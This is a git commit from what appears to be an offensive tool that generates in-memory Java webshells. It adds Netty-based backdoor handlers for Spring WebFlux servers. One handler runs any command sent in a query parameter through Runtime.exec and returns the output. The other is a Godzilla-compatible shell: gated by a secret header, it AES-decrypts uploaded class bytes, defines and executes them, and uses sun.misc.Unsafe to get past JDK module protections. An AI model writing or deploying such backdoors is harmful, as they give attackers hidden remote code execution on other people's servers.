feat: support webflux netty shell (#8)

Author: ReaJason

generator/build.gradle

@@ -62,7 +62,8 @@ dependencies {
     implementation 'org.springframework:spring-webmvc:4.3.30.RELEASE'
     implementation 'org.springframework:spring-web:4.3.30.RELEASE'
     implementation 'org.springframework:spring-webflux:5.3.24'
-
+    implementation 'io.netty:netty-all:4.1.116.Final'
+    implementation 'io.projectreactor.netty:reactor-netty-core:1.1.25'
     testImplementation platform('org.junit:junit-bom:5.+')
     testImplementation 'org.junit.jupiter:junit-jupiter'
     testRuntimeOnly 'org.junit.platform:junit-platform-launcher'

generator/src/main/java/com/reajason/javaweb/GeneratorMain.java

@@ -1,12 +1,14 @@
 package com.reajason.javaweb;
 
 import com.reajason.javaweb.memshell.AbstractShell;
+import com.reajason.javaweb.memshell.SpringWebFluxShell;
 import com.reajason.javaweb.memshell.WebSphereShell;
 import com.reajason.javaweb.memshell.config.*;
 import com.reajason.javaweb.memshell.packer.Packer;
 import com.reajason.javaweb.memshell.utils.CommonUtil;
 import lombok.SneakyThrows;
 import net.bytebuddy.jar.asm.Opcodes;
+import org.apache.commons.codec.binary.Base64;
 import org.apache.commons.lang3.StringUtils;
 
 import java.io.IOException;
@@ -21,10 +23,10 @@ public class GeneratorMain {
 
     public static void main(String[] args) throws IOException {
         ShellConfig shellConfig = ShellConfig.builder()
-                .server(Server.WebSphere)
-                .shellTool(ShellTool.Command)
-                .shellType(WebSphereShell.AGENT_FILTER_MANAGER)
-                .targetJreVersion(Opcodes.V1_6)
+                .server(Server.SpringWebflux)
+                .shellTool(ShellTool.Godzilla)
+                .shellType(SpringWebFluxShell.NETTY_HANDLER)
+                .targetJreVersion(Opcodes.V1_8)
                 .debug(true)
                 .build();
         GodzillaConfig godzillaConfig = GodzillaConfig.builder()
@@ -41,12 +43,12 @@ public static void main(String[] args) throws IOException {
 
         InjectorConfig injectorConfig = new InjectorConfig();
 
-        GenerateResult generateResult = generate(shellConfig, injectorConfig, commandConfig);
+        GenerateResult generateResult = generate(shellConfig, injectorConfig, godzillaConfig);
         if (generateResult != null) {
 //            Files.write(Paths.get(generateResult.getInjectorClassName() + ".class"), generateResult.getInjectorBytes(), StandardOpenOption.CREATE_NEW);
 //            Files.write(Paths.get(generateResult.getShellClassName() + ".class"), generateResult.getShellBytes(), StandardOpenOption.CREATE_NEW);
-//            System.out.println(Base64.encodeBase64String(generateResult.getInjectorBytes()));
-            Files.write(Path.of("target.jar"), Packer.INSTANCE.AgentJar.getPacker().packBytes(generateResult));
+            System.out.println(Base64.encodeBase64String(generateResult.getInjectorBytes()));
+//            Files.write(Path.of("target.jar"), Packer.INSTANCE.AgentJar.getPacker().packBytes(generateResult));
         }
     }
 

generator/src/main/java/com/reajason/javaweb/memshell/SpringWebFluxShell.java

@@ -2,12 +2,15 @@
 
 import com.reajason.javaweb.memshell.springwebflux.command.CommandHandlerFunction;
 import com.reajason.javaweb.memshell.springwebflux.command.CommandHandlerMethod;
+import com.reajason.javaweb.memshell.springwebflux.command.CommandNettyHandler;
 import com.reajason.javaweb.memshell.springwebflux.command.CommandWebFilter;
 import com.reajason.javaweb.memshell.springwebflux.godzilla.GodzillaHandlerFunction;
 import com.reajason.javaweb.memshell.springwebflux.godzilla.GodzillaHandlerMethod;
+import com.reajason.javaweb.memshell.springwebflux.godzilla.GodzillaNettyHandler;
 import com.reajason.javaweb.memshell.springwebflux.godzilla.GodzillaWebFilter;
 import com.reajason.javaweb.memshell.springwebflux.injector.SpringWebFluxHandlerFunctionInjector;
 import com.reajason.javaweb.memshell.springwebflux.injector.SpringWebFluxHandlerMethodInjector;
+import com.reajason.javaweb.memshell.springwebflux.injector.SpringWebFluxNettyHandlerInjector;
 import com.reajason.javaweb.memshell.springwebflux.injector.SpringWebFluxWebFilterInjector;
 import org.apache.commons.lang3.tuple.Pair;
 
@@ -21,13 +24,15 @@ public class SpringWebFluxShell extends AbstractShell {
     public static final String WEB_FILTER = "WebFilter";
     public static final String HANDLER_METHOD = "HandlerMethod";
     public static final String HANDLER_FUNCTION = "HandlerFunction";
+    public static final String NETTY_HANDLER = "NettyHandler";
 
     @Override
     protected Map<String, Pair<Class<?>, Class<?>>> getCommandShellMap() {
         return Map.of(
                 WEB_FILTER, Pair.of(CommandWebFilter.class, SpringWebFluxWebFilterInjector.class),
                 HANDLER_METHOD, Pair.of(CommandHandlerMethod.class, SpringWebFluxHandlerMethodInjector.class),
-                HANDLER_FUNCTION, Pair.of(CommandHandlerFunction.class, SpringWebFluxHandlerFunctionInjector.class)
+                HANDLER_FUNCTION, Pair.of(CommandHandlerFunction.class, SpringWebFluxHandlerFunctionInjector.class),
+                NETTY_HANDLER, Pair.of(CommandNettyHandler.class, SpringWebFluxNettyHandlerInjector.class)
         );
     }
 
@@ -36,7 +41,8 @@ protected Map<String, Pair<Class<?>, Class<?>>> getGodzillaShellMap() {
         return Map.of(
                 WEB_FILTER, Pair.of(GodzillaWebFilter.class, SpringWebFluxWebFilterInjector.class),
                 HANDLER_METHOD, Pair.of(GodzillaHandlerMethod.class, SpringWebFluxHandlerMethodInjector.class),
-                HANDLER_FUNCTION, Pair.of(GodzillaHandlerFunction.class, SpringWebFluxHandlerFunctionInjector.class)
+                HANDLER_FUNCTION, Pair.of(GodzillaHandlerFunction.class, SpringWebFluxHandlerFunctionInjector.class),
+                NETTY_HANDLER, Pair.of(GodzillaNettyHandler.class, SpringWebFluxNettyHandlerInjector.class)
         );
     }
 }

memshell-java8/build.gradle

@@ -18,6 +18,8 @@ dependencies {
     implementation 'org.springframework:spring-webmvc:4.3.30.RELEASE'
     implementation 'org.springframework:spring-webflux:5.3.24'
     implementation 'org.springframework:spring-web:4.3.30.RELEASE'
+    implementation 'io.projectreactor.netty:reactor-netty-core:1.1.25'
+    implementation 'io.netty:netty-all:4.1.116.Final'
     implementation 'net.bytebuddy:byte-buddy:1.+'
     providedCompile 'javax.servlet:javax.servlet-api:3.0.1'
     providedCompile 'javax.websocket:javax.websocket-api:1.1'

memshell-java8/src/main/java/com/reajason/javaweb/memshell/springwebflux/command/CommandHandlerMethod.java

@@ -19,7 +19,6 @@ public CommandHandlerMethod() {
     public ResponseEntity<?> invoke(ServerWebExchange exchange) {
         try {
             String cmd = exchange.getRequest().getQueryParams().getFirst(paramName);
-            System.out.println("handler method cmd: " + cmd);
             StringBuilder result = new StringBuilder();
             try {
                 if (cmd != null) {

memshell-java8/src/main/java/com/reajason/javaweb/memshell/springwebflux/command/CommandNettyHandler.java

@@ -0,0 +1,73 @@
+package com.reajason.javaweb.memshell.springwebflux.command;
+
+import io.netty.buffer.Unpooled;
+import io.netty.channel.ChannelDuplexHandler;
+import io.netty.channel.ChannelFutureListener;
+import io.netty.channel.ChannelHandler;
+import io.netty.channel.ChannelHandlerContext;
+import io.netty.handler.codec.http.*;
+
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+import java.net.URI;
+import java.nio.charset.StandardCharsets;
+
+/**
+ * @author ReaJason
+ */
+@ChannelHandler.Sharable
+public class CommandNettyHandler extends ChannelDuplexHandler {
+    public static String paramName;
+
+    @Override
+    @SuppressWarnings("all")
+    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
+        if (msg instanceof DefaultHttpRequest) {
+            DefaultHttpRequest request = (DefaultHttpRequest) msg;
+            HttpHeaders headers = request.headers();
+            String uri = request.uri();
+            String cmd = getParameter(uri, paramName);
+            if (cmd == null) {
+                ctx.fireChannelRead(msg);
+                return;
+            }
+            StringBuilder result = new StringBuilder();
+            try {
+                Process exec = Runtime.getRuntime().exec(cmd);
+                try (BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(exec.getInputStream()))) {
+                    String line;
+                    while ((line = bufferedReader.readLine()) != null) {
+                        result.append(line);
+                        result.append(System.lineSeparator());
+                    }
+                }
+            } catch (Exception ignored) {
+            }
+            send(ctx, result.toString());
+        }
+    }
+
+    public String getParameter(String requestUrl, String paramName) throws Exception {
+        URI uri = new URI(requestUrl);
+        String query = uri.getQuery();
+        String[] kvs = query.split("&");
+        for (String kv : kvs) {
+            String k = null;
+            String[] pair = kv.split("=", 2);
+            if (pair.length > 0) {
+                k = pair[0];
+            }
+            if (pair.length > 1 && k != null && k.equals(paramName)) {
+                return pair[1];
+            }
+        }
+        return null;
+    }
+
+    private void send(ChannelHandlerContext ctx, String context) throws Exception {
+        FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, HttpResponseStatus.OK, Unpooled.copiedBuffer(context, StandardCharsets.UTF_8));
+        response.headers().set("Content-Type", "text/plain; charset=UTF-8");
+        response.headers().set(HttpHeaderNames.CONTENT_LENGTH, response.content().readableBytes());
+        ctx.channel().writeAndFlush(response).addListener(ChannelFutureListener.CLOSE);
+    }
+}

memshell-java8/src/main/java/com/reajason/javaweb/memshell/springwebflux/godzilla/GodzillaNettyHandler.java

@@ -0,0 +1,159 @@
+package com.reajason.javaweb.memshell.springwebflux.godzilla;
+
+import io.netty.buffer.Unpooled;
+import io.netty.channel.ChannelDuplexHandler;
+import io.netty.channel.ChannelFutureListener;
+import io.netty.channel.ChannelHandler;
+import io.netty.channel.ChannelHandlerContext;
+import io.netty.handler.codec.http.*;
+import io.netty.util.CharsetUtil;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.SecretKeySpec;
+import java.io.ByteArrayOutputStream;
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.net.URLClassLoader;
+import java.net.URLDecoder;
+import java.nio.charset.StandardCharsets;
+
+@ChannelHandler.Sharable
+public class GodzillaNettyHandler extends ChannelDuplexHandler {
+    public static String key;
+    public static String pass;
+    public static String md5;
+    public static String headerName;
+    public static String headerValue;
+    private StringBuilder requestBody = new StringBuilder();
+    private DefaultHttpRequest request;
+    private static Class<?> payload;
+
+    private static Class<?> defClass(byte[] classbytes) throws Exception {
+        URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
+        Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+        method.setAccessible(true);
+        return (Class<?>) method.invoke(urlClassLoader, classbytes, 0, classbytes.length);
+    }
+
+    public byte[] x(byte[] s, boolean m) {
+        try {
+            Cipher c = Cipher.getInstance("AES");
+            c.init(m ? 1 : 2, new SecretKeySpec(key.getBytes(), "AES"));
+            return c.doFinal(s);
+        } catch (Exception e) {
+            return null;
+        }
+    }
+
+    @Override
+    public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception {
+        if (msg instanceof DefaultHttpRequest) {
+            request = (DefaultHttpRequest) msg;
+            HttpHeaders headers = request.headers();
+            String value = headers.get(headerName);
+            if (value == null || !value.equals(headerValue)) {
+                ctx.fireChannelRead(msg);
+                return;
+            }
+            // 如果是当前 payload 进来不能调用 ctx.fireChannelRead(msg)，不然的话下面不能拿到完整的 request body
+        }
+        if (msg instanceof HttpContent) {
+            HttpContent httpContent = (HttpContent) msg;
+            HttpHeaders headers = request.headers();
+            String value = headers.get(headerName);
+
+            // quick fail，防止其他哥斯拉马打进来走这个逻辑寄了
+            if (value == null || !value.equals(headerValue)) {
+                ctx.fireChannelRead(msg);
+                return;
+            }
+
+            String content = httpContent.content().toString(CharsetUtil.UTF_8);
+            requestBody.append(content);
+            if (httpContent instanceof LastHttpContent) {
+                try {
+                    String base64Str = URLDecoder.decode(requestBody.substring(pass.length() + 1), "UTF-8");
+                    requestBody.setLength(0);
+                    byte[] data = x(base64Decode(base64Str), false);
+                    if (payload == null) {
+                        payload = defClass(data);
+                        send(ctx, "");
+                        return;
+                    } else {
+                        Object f = payload.newInstance();
+                        ByteArrayOutputStream arrOut = new ByteArrayOutputStream();
+                        f.equals(arrOut);
+                        f.equals(data);
+                        f.toString();
+                        send(ctx, md5.substring(0, 16) + base64Encode(x(arrOut.toByteArray(), true)) + md5.substring(16));
+                    }
+                    return;
+                } catch (Exception ignored) {
+                }
+            }
+            ctx.fireChannelRead(msg);
+        }
+    }
+
+    @SuppressWarnings("all")
+    public static String base64Encode(byte[] bs) throws Exception {
+        String value = null;
+        Class<?> base64;
+        try {
+            base64 = Class.forName("java.util.Base64");
+            Object encoder = base64.getMethod("getEncoder", (Class<?>[]) null).invoke(base64, (Object[]) null);
+            value = (String) encoder.getClass().getMethod("encodeToString", byte[].class).invoke(encoder, bs);
+        } catch (Exception var6) {
+            try {
+                base64 = Class.forName("sun.misc.BASE64Encoder");
+                Object encoder = base64.newInstance();
+                value = (String) encoder.getClass().getMethod("encode", byte[].class).invoke(encoder, bs);
+            } catch (Exception ignored) {
+            }
+        }
+        return value;
+    }
+
+    @SuppressWarnings("all")
+    public static byte[] base64Decode(String bs) {
+        byte[] value = null;
+        Class<?> base64;
+        try {
+            base64 = Class.forName("java.util.Base64");
+            Object decoder = base64.getMethod("getDecoder", (Class<?>[]) null).invoke(base64, (Object[]) null);
+            value = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, bs);
+        } catch (Exception var6) {
+            try {
+                base64 = Class.forName("sun.misc.BASE64Decoder");
+                Object decoder = base64.newInstance();
+                value = (byte[]) decoder.getClass().getMethod("decodeBuffer", String.class).invoke(decoder, bs);
+            } catch (Exception ignored) {
+            }
+        }
+        return value;
+    }
+
+    private void send(ChannelHandlerContext ctx, String context) throws Exception {
+        FullHttpResponse response = new DefaultFullHttpResponse(HttpVersion.HTTP_1_1, HttpResponseStatus.OK, Unpooled.copiedBuffer(context, StandardCharsets.UTF_8));
+        response.headers().set("Content-Type", "text/plain; charset=UTF-8");
+        response.headers().set(HttpHeaderNames.CONTENT_LENGTH, response.content().readableBytes());
+        ctx.channel().writeAndFlush(response).addListener(ChannelFutureListener.CLOSE);
+    }
+
+    static {
+        // webflux3 jdk17 bypass module
+        try {
+            Class<?> unsafeClass = Class.forName("sun.misc.Unsafe");
+            java.lang.reflect.Field unsafeField = unsafeClass.getDeclaredField("theUnsafe");
+            unsafeField.setAccessible(true);
+            Object unsafe = unsafeField.get(null);
+            Object module = Class.class.getMethod("getModule").invoke(Object.class, (Object[]) null);
+            java.lang.reflect.Method objectFieldOffsetM = unsafe.getClass().getMethod("objectFieldOffset", Field.class);
+            Long offset = (Long) objectFieldOffsetM.invoke(unsafe, Class.class.getDeclaredField("module"));
+            java.lang.reflect.Method getAndSetObjectM = unsafe.getClass().getMethod("getAndSetObject", Object.class, long.class, Object.class);
+            getAndSetObjectM.invoke(unsafe, GodzillaNettyHandler.class, offset, module);
+        } catch (Exception ignored) {
+        }
+    }
+}